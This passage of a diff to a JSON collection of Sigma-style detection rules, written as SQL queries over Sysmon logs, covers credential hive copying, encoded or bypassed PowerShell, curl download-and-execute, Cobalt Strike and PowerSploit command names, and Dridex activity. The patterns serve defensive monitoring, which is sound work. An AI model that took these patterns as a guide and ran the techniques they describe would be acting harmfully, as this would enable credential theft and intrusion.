'\\' OR CommandLine LIKE '%\\\\repair\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\security%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_regsvr32_flags_anomaly.yml" + "filename": "proc_creation_win_esentutl_sensitive_file_copy.yml" }, { - "title": "Suspicious PowerShell Parameter Substring", - "id": "36210e0d-5b19-485d-a087-c096088885f0", - "status": "test", - "description": "Detects suspicious PowerShell invocation with a parameter substring", - "author": "Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)", + "title": "Renamed PsExec Service Execution", + "id": "51ae86a2-e2e1-4097-ad85-c46cb6851de4", + "status": "experimental", + "description": "Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by 
legitimate administrators", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate administrative tasks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% -windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% -windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% -windowst h%' ESCAPE '\\' OR CommandLine LIKE '% -windows h%' ESCAPE '\\' OR CommandLine LIKE '% -windo h%' ESCAPE '\\' OR CommandLine LIKE '% -wind h%' ESCAPE '\\' OR CommandLine LIKE '% -win h%' ESCAPE '\\' OR CommandLine LIKE '% -wi h%' ESCAPE '\\' OR CommandLine LIKE '% -win h %' ESCAPE '\\' OR CommandLine LIKE '% -win hi %' ESCAPE '\\' OR CommandLine LIKE '% -win hid %' ESCAPE '\\' OR CommandLine LIKE '% -win hidd %' ESCAPE '\\' OR CommandLine LIKE '% -win hidde %' ESCAPE '\\' OR CommandLine LIKE '% -NoPr %' ESCAPE '\\' OR CommandLine LIKE '% -NoPro %' ESCAPE '\\' OR CommandLine LIKE '% -NoProf %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% -nonin %' ESCAPE '\\' OR CommandLine LIKE '% -nonint %' ESCAPE '\\' OR CommandLine LIKE '% -noninte %' ESCAPE '\\' OR CommandLine LIKE '% -noninter %' ESCAPE '\\' OR CommandLine LIKE '% -nonintera %' ESCAPE '\\' OR CommandLine LIKE '% -noninterac %' ESCAPE '\\' OR CommandLine LIKE '% -noninteract %' ESCAPE '\\' OR CommandLine LIKE '% -noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% -noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% -ec %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% 
-encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% -encodedC %' ESCAPE '\\' OR CommandLine LIKE '% -encoded %' ESCAPE '\\' OR CommandLine LIKE '% -encode %' ESCAPE '\\' OR CommandLine LIKE '% -encod %' ESCAPE '\\' OR CommandLine LIKE '% -enco %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% -executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% -executionpol %' ESCAPE '\\' OR CommandLine LIKE '% -executionpo %' ESCAPE '\\' OR CommandLine LIKE '% -executionp %' ESCAPE '\\' OR CommandLine LIKE '% -execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass%' ESCAPE '\\' OR CommandLine LIKE '% /windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% /windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% /windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% /windowst h%' ESCAPE '\\' OR CommandLine LIKE '% /windows h%' ESCAPE '\\' OR CommandLine LIKE '% /windo h%' ESCAPE '\\' OR CommandLine LIKE '% /wind h%' ESCAPE '\\' OR CommandLine LIKE '% /win h%' ESCAPE '\\' OR CommandLine LIKE '% /wi h%' ESCAPE '\\' OR CommandLine LIKE '% /win h %' ESCAPE '\\' OR CommandLine LIKE '% /win hi %' ESCAPE '\\' OR CommandLine LIKE '% /win hid %' ESCAPE '\\' OR CommandLine LIKE '% /win hidd %' ESCAPE '\\' OR CommandLine LIKE '% /win hidde %' ESCAPE '\\' OR CommandLine LIKE '% /NoPr %' ESCAPE '\\' OR CommandLine LIKE '% /NoPro %' ESCAPE '\\' OR CommandLine LIKE '% /NoProf %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% /nonin %' 
ESCAPE '\\' OR CommandLine LIKE '% /nonint %' ESCAPE '\\' OR CommandLine LIKE '% /noninte %' ESCAPE '\\' OR CommandLine LIKE '% /noninter %' ESCAPE '\\' OR CommandLine LIKE '% /nonintera %' ESCAPE '\\' OR CommandLine LIKE '% /noninterac %' ESCAPE '\\' OR CommandLine LIKE '% /noninteract %' ESCAPE '\\' OR CommandLine LIKE '% /noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% /noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% /ec %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% /encodedC %' ESCAPE '\\' OR CommandLine LIKE '% /encoded %' ESCAPE '\\' OR CommandLine LIKE '% /encode %' ESCAPE '\\' OR CommandLine LIKE '% /encod %' ESCAPE '\\' OR CommandLine LIKE '% /enco %' ESCAPE '\\' OR CommandLine LIKE '% /en %' ESCAPE '\\' OR CommandLine LIKE '% /executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% /executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% /executionpol %' ESCAPE '\\' OR CommandLine LIKE '% /executionpo %' ESCAPE '\\' OR CommandLine LIKE '% /executionp %' ESCAPE '\\' OR CommandLine LIKE '% /execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ep bypass%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'psexesvc.exe' AND NOT (Image LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_susp_parameter_variation.yml" + "filename": 
"proc_creation_win_renamed_sysinternals_psexec_service.yml" }, { - "title": "Suspicious File Download via CertOC.exe", - "id": "70ad0861-d1fe-491c-a45f-fa48148a300d", - "status": "experimental", - "description": "Detects when a user downloads file by using CertOC.exe", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Dridex Activity", + "id": "e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e", + "status": "stable", + "description": "Detects potential Dridex acitvity via specific process patterns", + "author": "Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055", + "attack.discovery", + "attack.t1135", + "attack.t1033" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND CommandLine LIKE '%-GetCACAPS%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') AND NOT (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\excel.exe' ESCAPE '\\' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '% -s %' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.dll%' ESCAPE '\\'))) OR (ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\whoami.exe' ESCAPE '\\' AND CommandLine LIKE '% /all%' ESCAPE '\\') OR ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% 
view%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_lolbin_certoc_download.yml" + "filename": "proc_creation_win_malware_dridex.yml" }, { - "title": "Suspicious Schtasks From Env Var Folder", - "id": "81325ce1-be01-4250-944f-b4789644556f", - "status": "experimental", - "description": "Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware", - "author": "Florian Roth (Nextron Systems)", + "title": "RDP Connection Allowed Via Netsh.EXE", + "id": "01aeb693-138d-49d2-9403-c4f52d7d3d62", + "status": "test", + "description": "Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware", + "author": "Sander Wiebing", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1562.004" ], "falsepositives": [ - "Benign scheduled tasks creations or executions that happen often during software installations", - "Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders" + "Legitimate administration activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\')) OR (ParentCommandLine LIKE '%\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND (CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE 
'%C:\\\\Perflogs%' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%update\\_task.xml%' ESCAPE '\\' OR CommandLine LIKE '%/Create /TN TVInstallRestore /TR%' ESCAPE '\\') OR ParentCommandLine LIKE '%unattended.ini%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /Xml \"C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\.CR.%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_Security\\_Installation.xml%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /F /TN%' ESCAPE '\\' AND CommandLine LIKE '%/Xml %' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_%' ESCAPE '\\' AND (CommandLine LIKE '%.tmp\\\\UpdateFallbackTask.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\WatchdogServiceControlManagerTimeout.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\SystrayAutostart.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\MaintenanceTask.xml%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/Create /TN \"klcp\\_update\" /XML %' ESCAPE '\\' AND CommandLine LIKE '%\\\\klcp\\_update\\_task.xml%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%firewall %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%tcp %' ESCAPE '\\' AND CommandLine LIKE '%3389%' ESCAPE '\\') AND (CommandLine LIKE '%portopening%' ESCAPE '\\' OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%allow%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_schtasks_env_folder.yml" + "filename": "proc_creation_win_netsh_fw_allow_rdp.yml" }, { - "title": "Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS", - "id": "07aa184a-870d-413d-893a-157f317f6f58", + "title": "PowerShell Base64 Encoded Invoke Keyword", + 
"id": "6385697e-9f1b-40bd-8817-f4a91f40508e", "status": "test", - "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". Which can be used to gather information about the target machine", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls", + "author": "pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t", "tags": [ - "attack.discovery", "attack.execution", - "attack.t1615", - "attack.t1059.005" + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%gatherNetworkInfo.vbs%' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '% -e%' ESCAPE '\\' AND (CommandLine LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR CommandLine LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR CommandLine LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\' OR CommandLine LIKE '%SW52b2tlL%' ESCAPE '\\' OR CommandLine LIKE '%ludm9rZS%' ESCAPE '\\' OR CommandLine LIKE '%JbnZva2Ut%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_gather_network_info_execution.yml" + "filename": "proc_creation_win_powershell_base64_invoke.yml" }, { - "title": "Suspicious RazerInstaller Explorer Subprocess", - "id": "a4eaf250-7dc1-4842-862a-5e71cd59a167", - "status": "test", - "description": "Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to 
escalate privileges to LOCAL SYSTEM", - "author": "Florian Roth (Nextron Systems), Maxime Thiebaut", + "title": "Suspect Svchost Activity", + "id": "16c37b52-b141-42a5-a3ea-bbe098444397", + "status": "experimental", + "description": "It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.", + "author": "David Burkett, @signalblur", "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1553" + "attack.t1055" ], "falsepositives": [ - "User selecting a different installation folder (check for other sub processes of this explorer.exe process)" + "Rpcnet.exe / rpcnetp.exe which is a lojack style software. https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\RazerInstaller.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND NOT (Image LIKE 'C:\\\\Windows\\\\Installer\\\\Razer\\\\Installer\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rpcnetp.exe' ESCAPE '\\') OR CommandLine = ''))" ], - "filename": "proc_creation_win_exploit_other_razorinstaller_lpe.yml" + "filename": "proc_creation_win_svchost_execution_with_no_cli_flags.yml" }, { - "title": "Potential Meterpreter/CobaltStrike Activity", - "id": "15619216-e993-4721-b590-4c520615a67d", - "status": "test", - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting", - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "title": "HackTool - Certify 
Execution", + "id": "762f2482-ff21-4970-8939-0aa317a886bb", + "status": "experimental", + "description": "Detects Certify a tool for Active Directory certificate abuse based on PE metadata characteristics and common command line arguments.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" + "attack.discovery", + "attack.credential_access", + "attack.t1649" ], "falsepositives": [ - "Commandlines containing components like cmd accidentally", - "Jobs and services started with cmd" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%\\\\pipe\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%cmd%' ESCAPE '\\' OR CommandLine LIKE '%\\%COMSPEC\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%.dll,a%' ESCAPE '\\' AND CommandLine LIKE '%/p:%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%MpCmdRun%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Certify.exe' ESCAPE '\\' OR OriginalFileName = 'Certify.exe' OR Description LIKE '%Certify%' ESCAPE '\\') OR ((CommandLine LIKE '%.exe cas %' ESCAPE '\\' OR CommandLine LIKE '%.exe find %' ESCAPE '\\' OR CommandLine LIKE '%.exe pkiobjects %' ESCAPE '\\' OR CommandLine LIKE '%.exe request %' ESCAPE '\\' OR CommandLine LIKE '%.exe download %' ESCAPE '\\') AND (CommandLine LIKE '% /vulnerable%' ESCAPE '\\' OR CommandLine LIKE '% /template:%' ESCAPE '\\' OR CommandLine LIKE '% /altname:%' ESCAPE '\\' OR CommandLine LIKE '% /domain:%' ESCAPE '\\' OR CommandLine LIKE '% /path:%' ESCAPE '\\' OR CommandLine LIKE '% /ca:%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_hktl_meterpreter_getsystem.yml" 
+ "filename": "proc_creation_win_hktl_certify.yml" }, { - "title": "CobaltStrike Load by Rundll32", - "id": "ae9c6a7c-9521-42a6-915e-5aaa8689d529", + "title": "Curl Download And Execute Combination", + "id": "21dd6d38-2b18-4453-9404-a0fe4a0cc288", "status": "test", - "description": "Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.", - "author": "Wojciech Lesicki", + "description": "Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.", + "author": "Sreeman, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.execution", + "attack.t1218", + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' OR CommandLine LIKE '%rundll32 %' ESCAPE '\\')) AND (CommandLine LIKE '%.dll%' ESCAPE '\\' AND (CommandLine LIKE '% StartW' ESCAPE '\\' OR CommandLine LIKE '%,StartW' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '%curl %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%-o%' ESCAPE '\\' AND CommandLine LIKE '%&%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml" + "filename": "proc_creation_win_cmd_curl_download_exec_combo.yml" }, { - "title": "MSHTA Suspicious Execution 01", - "id": "cc7abbd0-762b-41e3-8a26-57ad50d2eea3", - "status": "test", - "description": "Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism", - "author": "Diego Perez (@darkquassar), Markus Neis, 
Swisscom (Improve Rule)", + "title": "DLL Sideloading by VMware Xfer Utility", + "id": "ebea773c-a8f1-42ad-a856-00cb221966e8", + "status": "experimental", + "description": "Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1140", - "attack.t1218.005", - "attack.execution", - "attack.t1059.007", - "cve.2020.1599" + "attack.t1574.002" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\mshta.exe' ESCAPE '\\' AND (CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.lnk%' ESCAPE '\\' OR CommandLine LIKE '%.xls%' ESCAPE '\\' OR CommandLine LIKE '%.doc%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND NOT (Image LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mshta_susp_execution.yml" + "filename": "proc_creation_win_dll_sideload_vmware_xfer.yml" }, { - "title": "PUA- IOX Tunneling Tool Execution", - "id": "d7654f02-e04b-4934-9838-65c46f187ebc", + "title": "Operator Bloopers Cobalt Strike Commands", + "id": "647c7b9e-d784-4fda-b9a0-45c565a7b729", "status": "experimental", - "description": "Detects the use of IOX - a tool for port forwarding and intranet proxy purposes", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects use of Cobalt Strike commands accidentally entered in the CMD shell", + 
"author": "_pete_0, TheDFIRReport", "tags": [ - "attack.command_and_control", - "attack.t1090" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\iox.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe fwd -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe fwd -r %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -r %' ESCAPE '\\') OR (Hashes LIKE '%MD5=9DB2D314DD3F704A02051EF5EA210993%' ESCAPE '\\' OR Hashes LIKE '%SHA1=039130337E28A6623ECF9A0A3DA7D92C5964D8DD%' ESCAPE '\\' OR Hashes LIKE '%SHA256=C6CF82919B809967D9D90EA73772A8AA1C1EB3BC59252D977500F64F1A0D6731%' ESCAPE '\\') OR md5 = '9db2d314dd3f704a02051ef5ea210993' OR sha1 = '039130337e28a6623ecf9a0a3da7d92c5964d8dd' OR sha256 = 'c6cf82919b809967d9d90ea73772a8aa1c1eb3bc59252d977500f64f1a0d6731'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Cmd.Exe' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND ((CommandLine LIKE 'cmd %' ESCAPE '\\' OR CommandLine LIKE 'cmd.exe%' ESCAPE '\\' OR CommandLine LIKE 'c:\\\\windows\\\\system32\\\\cmd.exe%' ESCAPE '\\') AND (CommandLine LIKE '%psinject%' ESCAPE '\\' OR CommandLine LIKE '%spawnas%' ESCAPE '\\' OR CommandLine LIKE '%make\\_token%' ESCAPE '\\' OR CommandLine LIKE '%remote-exec%' ESCAPE '\\' OR CommandLine LIKE '%rev2self%' ESCAPE '\\' OR CommandLine LIKE '%dcsync%' ESCAPE '\\' OR CommandLine LIKE '%logonpasswords%' ESCAPE '\\' OR CommandLine LIKE '%execute-assembly%' ESCAPE '\\' OR CommandLine LIKE '%getsystem%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_iox.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml" }, { - "title": "Run PowerShell Script from ADS", - "id": "45a594aa-1fbd-4972-a809-ff5a99dd81b8", - "status": "test", - 
"description": "Detects PowerShell script execution from Alternate Data Stream (ADS)", - "author": "Sergey Soldatov, Kaspersky Lab, oscd.community", + "title": "Malicious PowerShell Commandlets - ProcessCreation", + "id": "02030f2f-6199-49ec-b258-ea71b07e03dc", + "status": "experimental", + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.execution", + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1069", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Get-Content%' ESCAPE '\\' AND CommandLine LIKE '%-Stream%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Add-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Add-Persistence%' ESCAPE '\\' OR CommandLine LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Check-VM%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR CommandLine LIKE '%Decrypt-Hash%' ESCAPE '\\' OR CommandLine LIKE '%Disable-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Disable-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%Do-Exfiltration%' ESCAPE 